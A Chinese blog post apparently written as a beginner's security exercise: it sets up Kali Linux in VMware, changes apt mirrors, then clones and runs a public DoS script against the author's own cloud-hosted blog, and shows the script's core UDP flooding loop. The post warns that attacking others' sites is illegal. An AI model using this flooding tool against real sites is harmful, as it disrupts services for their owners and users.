对自己的博客网站进行DOS攻击

levitgu2023-12-17 22:06

对自己的博客网站进行DOS攻击

先说明一点,别对别人的网站进行ddos/dos攻击(dos攻击一般短时间攻击不下来),这是违法的,很多都有自动报警机制,本篇博客仅用于学习,请勿用于非法用途

安装kaili Linux

进入KALI官网,下载iso镜像文件

vmware新建虚拟机,选择自定义

点击下一步

点击下一步

点击下一步

选择稍后安装操作系统,点击下一步

选择Debian系统,版本根据自己的kali版本来,我这里就选最新的Debian12,点击下一步

虚拟机名称和存储位置根据自己情况来,点击下一步

处理器配置根据自己电脑的配置来,点击下一步

内存也是根据自己的使用情况来,点击下一步

点击下一步

点击下一步

点击下一步

点击下一步

点击下一步

点击下一步

点击自定义硬件

导入下载好的ISO文件,关闭后点击完成即可

剩下启动后的配置就比较简单了,根据自己情况来即可

安装完成后打开是这样的:

换源+更新

进入root权限

shell 复制代码 
sudo su

输入密码后,换源

shell 复制代码 
sudo vim /etc/apt/sources.list

部分国内源:

shell 复制代码 
官方源
deb http://http.kali.org/kali kali-rolling main non-free contrib
deb-src http://http.kali.org/kali kali-rolling main non-free contrib
中科大
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
阿里云
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
清华大学
deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
浙大
deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free
deb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free
东软大学
deb http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib
deb-src http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib
重庆大学
deb http://http.kali.org/kali kali-rolling main non-free contrib
deb-src http://http.kali.org/kali kali-rolling main non-free contrib

自己选一个换上就行,然后进行更新:

shell 复制代码 
sudo apt-get update
DOS攻击

未被攻击前访问我的网站是这样的:

下载Dos数据包

shell 复制代码 
git clone https://github.com/Andysun06/ddos

进入ddos文件夹

shell 复制代码 
cd ddos

执行python脚本

shell 复制代码 
python ddos-p3.py

下面这两张用的是别人的图,不想打码了(雾

反正我攻击了大概8分钟,网站还是可以正常访问的,由于阿里云服务器有一定量的免费的cdn防护,我个人进行DOS攻击至少需要一小时才能耗完.这次只是实验一下,所以就不继续了.

我们可以看到受到攻击后服务器的带宽是有被大量消耗的,说明我们的攻击是有效的.

代码分析

去作者的github上把代码拉下来,看看是怎么写的:

python 复制代码 
os.system("clear")
os.system("figlet DDos Attack")
ip = input("请输入 IP     : ")
port = int(input("攻击端口      : "))
sd = int(input("攻击速度(1~1000) : "))

os.system("clear")

sent = 0
while True:
     sock.sendto(bytes, (ip,port))
     sent = sent + 1
     print ("已发送 %s 个数据包到 %s 端口 %d"%(sent,ip,port))
     time.sleep((1000-sd)/2000)

核心代码就这么几行,其实就是不断向指定IP的端口发送数据包,然后打印发送数据包的个数.

本人也是初入安全的小白,有什么不对的地方欢迎在评论区指出

相关推荐
Wukong.Sun2 分钟前
操作系统的概念,功能和目标
java·linux·开发语言·windows
2501_915106329 分钟前
无需 Mac,使用Appuploader简化iOS上架流程
websocket·网络协议·tcp/ip·http·网络安全·https·udp
茶本无香9 分钟前
Linux Alias 魔法:命令行效率提升秘籍
linux
万象.10 分钟前
进程地址空间
linux·centos
什么半岛铁盒20 分钟前
C++信号处理程序解析与改进
linux·c++·信号处理
工程师00733 分钟前
C#AES加密
网络·安全·web安全·c#
孙克旭_37 分钟前
day033-备份服务rsync
linux·运维·rsync
程序猿小D42 分钟前
第28节 Node.js 文件系统
服务器·前端·javascript·vscode·node.js·编辑器·vim
塔子终结者1 小时前
网络安全A模块专项练习任务七解析
安全·web安全·网络安全
极客奇点1 小时前
基于 Nginx 服务器的泛域名 SSL 证书申请与部署
服务器·nginx·ssl
热门推荐
01Coze扣子平台完整体验和实践(附国内和国际版对比)02【图像处理与机器视觉】XJTU期末考点03KGG转MP3工具|非KGM文件|解密音频04从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑05海康Visionmaster-常见问题排查方法-启动阶段06YOLOv8入门 | 重要性能衡量指标、训练结果评价及分析及影响mAP的因素【发论文关注的指标】07坚果投影仪J10如何用苹果Siri开关机并和米家联动08DeepSeek各版本说明与优缺点分析09【SpeedAI科研小助手】2分钟极速解决知网维普重复率、AIGC率过高,一键全文降!文件格式不变,公式都保留的!10【云原生】动态资源分配(DRA)深度洞察报告